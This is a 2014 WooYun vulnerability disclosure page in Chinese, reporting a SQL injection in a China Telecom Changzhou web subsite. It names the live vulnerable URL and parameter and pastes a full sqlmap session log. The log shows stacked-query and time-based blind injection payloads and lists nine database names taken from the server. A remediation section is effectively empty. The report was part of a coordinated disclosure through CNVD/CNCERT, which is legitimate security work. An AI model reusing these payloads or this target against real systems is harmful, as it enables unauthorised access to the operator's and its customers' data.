当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-061218

漏洞标题:中国电信常州市某分站一处post sql注入(横跨9个数据库)之第二蛋

相关厂商:中国电信

漏洞作者: Mosuan

提交时间:2014-05-22 16:15

修复时间:2014-07-06 16:16

公开时间:2014-07-06 16:16

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-22: 细节已通知厂商并且等待厂商处理中
2014-05-27: 厂商已经确认,细节仅向厂商公开
2014-06-06: 细节向核心白帽子及相关领域专家公开
2014-06-16: 细节向普通白帽子公开
2014-06-26: 细节向实习白帽子公开
2014-07-06: 细节向公众公开

简要描述:

呵呵

详细说明:

一个不能称为post的post,因为我发现的时候是post提交的数据,最后才发现可以get!!
注入地址

http://kd.czinfo.net/cx_ok.asp?u_name=122222


注入地址:http://kd.czinfo.net/cx_ok.asp?u_name=122222
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 23:36:08
[23:36:08] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化
版\rar\output\kd.czinfo.net\session' as session file
[23:36:08] [INFO] resuming back-end DBMS 'microsoft sql server 2000' from sessio
n file
[23:36:08] [INFO] testing connection to the target url
[23:36:08] [INFO] heuristics detected web page charset 'GB2312'
[23:36:08] [INFO] testing if the url is stable, wait a few seconds
[23:36:09] [INFO] url is stable
[23:36:09] [INFO] testing if GET parameter 'u_name' is dynamic
[23:36:09] [WARNING] GET parameter 'u_name' appears to be not dynamic
[23:36:09] [WARNING] heuristic test shows that GET parameter 'u_name' might not
be injectable
[23:36:09] [INFO] testing sql injection on GET parameter 'u_name'
[23:36:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:36:11] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[23:36:14] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[23:36:15] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[23:36:15] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[23:36:16] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[23:36:16] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[23:36:17] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[23:36:27] [INFO] GET parameter 'u_name' is 'Microsoft SQL Server/Sybase stacked
queries' injectable
[23:36:27] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[23:36:27] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[23:36:27] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[23:36:38] [INFO] GET parameter 'u_name' is 'Microsoft SQL Server/Sybase time-ba
sed blind' injectable
[23:36:38] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[23:36:39] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[23:36:40] [INFO] checking if the injection point on GET parameter 'u_name' is a
false positive
GET parameter 'u_name' is vulnerable. Do you want to keep testing the others (if
any)? [y/N] y
sqlmap identified the following injection points with a total of 72 HTTP(s) requ
ests:
---
Place: GET
Parameter: u_name
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: u_name=122222'; WAITFOR DELAY '0:0:5';-- AND 'NOgs'='NOgs
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: u_name=122222' WAITFOR DELAY '0:0:5'-- AND 'YLCL'='YLCL
---
[23:36:53] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[23:36:53] [INFO] fetching database names
[23:36:53] [INFO] fetching number of databases
[23:36:53] [INFO] retrieved:
[23:36:53] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
[23:37:08] [INFO] adjusting time delay to 4 seconds due to good response times
9
[23:37:09] [INFO] retrieved: 189_mail
[23:39:19] [INFO] retrieved: birth_db
[23:41:44] [INFO] retrieved: bl
[23:42:34] [ERROR] invalid character detected. retrying..
[23:42:34] [WARNING] increasing time delay to 5 seconds
ack_db
[23:44:28] [INFO] retrieved: master
[23:46:27] [INFO] retrieved: model
[23:48:19] [INFO] retrieved: msdb
[23:49:41] [INFO] retrieved: speed_2013
[23:53:11] [INFO] retrieved: tel_job
[23:55:51] [INFO] retrieved: tempdb
available databases [9]:
[*] 189_mail
[*] birth_db
[*] black_db
[*] master
[*] model
[*] msdb
[*] speed_2013
[*] tel_job
[*] tempdb
[23:58:06] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 43 times
[23:58:06] [INFO] Fetched data logged to text files under 'C:\Users\Administrato
r\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\kd.czinfo.net'

漏洞证明:

详细说明

修复方案:

你们懂的!!

版权声明:转载请注明来源 Mosuan@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-05-27 13:28

厂商回复:

CNVD确认并复现所述情况,转由CNCERT协调中国电信集团公司通报处置。

最新状态:

暂无